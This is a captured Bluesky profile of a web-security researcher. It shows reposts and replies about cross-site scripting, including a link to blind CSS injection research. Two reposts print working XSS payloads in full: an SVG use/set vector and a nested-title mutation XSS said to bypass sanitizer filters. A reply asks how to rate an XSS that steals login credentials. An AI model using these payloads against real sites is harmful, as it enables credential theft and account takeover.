BLUE
R
renniepak
@renniepak.bsky.social
Self-XSS connoisseur. Elite Hacker. MVH H11337UPBash. One-Percent Man. (he/him)
91 followers49 following5 posts
Reposted by renniepak
GHhandle.invalid

In case you missed it...I wrote a book, please support my work by buying a copy. If you've already bought one thank you please can you RT to spread the word! leanpub.com/javascriptfo...

0
Reposted by renniepak
GHhandle.invalid

You've heard of blind XSS - but what if there's CSP? Introducing blind CSS injection!  portswigger.net/research/bli...

Shows the CSS exfiltration process
1
Rrenniepak.bsky.social

Awesome thanks!

0
Rrenniepak.bsky.social

Curious: why is it your favorite?

1
Reposted by renniepak
GHhandle.invalid

My current fav XSS vector. Works on Chrome & Firefox:

<svg><use><set attributeName="href" to="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
1
Reposted by renniepak
GHhandle.invalid

Universal MXSS. Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.

<svg><title><title><image href="</title><iframe onload=alert(1)>"></title></title></svg>
0
Rrenniepak.bsky.social

How would you CVSS rate a XSS (DOM + postMessage so UI:R) where you steal credentials of the login page. Would you consider this ATO?

0
R
renniepak
@renniepak.bsky.social
Self-XSS connoisseur. Elite Hacker. MVH H11337UPBash. One-Percent Man. (he/him)
91 followers49 following5 posts